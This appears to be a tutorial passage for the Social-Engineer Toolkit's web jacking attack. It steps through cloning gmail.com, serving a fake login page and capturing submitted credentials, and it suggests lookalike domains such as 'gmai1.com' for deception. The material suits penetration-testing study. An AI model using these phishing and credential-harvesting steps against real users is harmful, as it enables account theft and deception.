Web Jacking Attack Method
The web jacking attack method will create a website clone and present the victim with a link stating that the website has moved. This is a new feature to SET version 0.7. When you hover over the link, the URL will be presented with the real URL, not the attackers machine. So for example if you're cloning gmail.com, the url when hovered over would display gmail.com. When the user clicks the moved link, gmail opens and then is quickly replaced with your malicious webserver. Remember, you can change the timing of the webjacking attack in the config/set_config flags.
1. The Java Applet Attack Method 2. The Metasploit Browser Exploit Method 3. Credential Harvester Attack Method 4. Tabnabbing Attack Method 5. Man Left in the Middle Attack Method 6. Web Jacking Attack Method 7. Multi-Attack Web Method 8. Return to the previous menu Enter your choice (press enter for default): 6 The first method will allow SET to import a list of pre-defined web applications that it can utilize within the attack. The second method will completely clone a website of your choosing and allow you to utilize the attack vectors within the completely same web application you were attempting to clone. The third method allows you to import your own website, note that you should only have an index.html when using the import website functionality. [!] Website Attack Vectors [!] 1. Web Templates 2. Site Cloner 3. Custom Import 4. Return to main menu Enter number (1-4): 2 SET supports both HTTP and HTTPS Example: http://www.thisisafakesite.com Enter the url to clone: https://gmail.com [*] Cloning the website: https://gmail.com [*] This could take a little bit... The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. [*] I have read the above message. [*] Press {return} to continue. [*] Web Jacking Attack Vector is Enabled...Victim needs to click the link. [*] Social-Engineer Toolkit Credential Harvester Attack [*] Credential Harvester is running on port 80 [*] Information will be displayed to you as it arrives below:
When the victim goes to the site he/she will notice the link below, notice the bottom left URL, its gmail.com.
When the victim clicks the link he is presented with the following webpage:
If you look at the URL bar, we are at our malicious web server. In cases with social-engineering, you want to make it believable so using an IP address is generally a bad idea. My recommendation is that if you're doing a penetration test, register a name that is similar to the victim so for gmail you could do gmai1.com (notice the 1), something similar that can mistake the user into thinking it’s the legitimate site. Most of the time they won’t even notice the IP address, but it's just another way to ensure it goes on without a hitch. Now that the victim enters the username and password in the fields, you will notice that we can intercept the credentials.
[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link. [*] Social-Engineer Toolkit Credential Harvester Attack [*] Credential Harvester is running on port 80 [*] Information will be displayed to you as it arrives below: 172.16.32.131 - - [09/Sep/2010 12:15:13] "GET / HTTP/1.1" 200 - 172.16.32.131 - - [09/Sep/2010 12:15:56] "GET /index2.html HTTP/1.1" 200 - [*] WE GOT A HIT! Printing the output: PARAM: ltmpl=default PARAM: ltmplcache=2 PARAM: continue=https://mail.google.com/mail/? PARAM: service=mail PARAM: rm=false PARAM: dsh=-7017428156907423605 PARAM: ltmpl=default PARAM: ltmpl=default PARAM: scc=1 PARAM: ss=1 PARAM: timeStmp= PARAM: secTok= PARAM: GALX=0JsVTaj70sk POSSIBLE USERNAME FIELD FOUND: Email=thisismyusername POSSIBLE PASSWORD FIELD FOUND: Passwd=thisismypassword PARAM: rmShown=1 PARAM: signIn=Sign+in PARAM: asts= [*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT
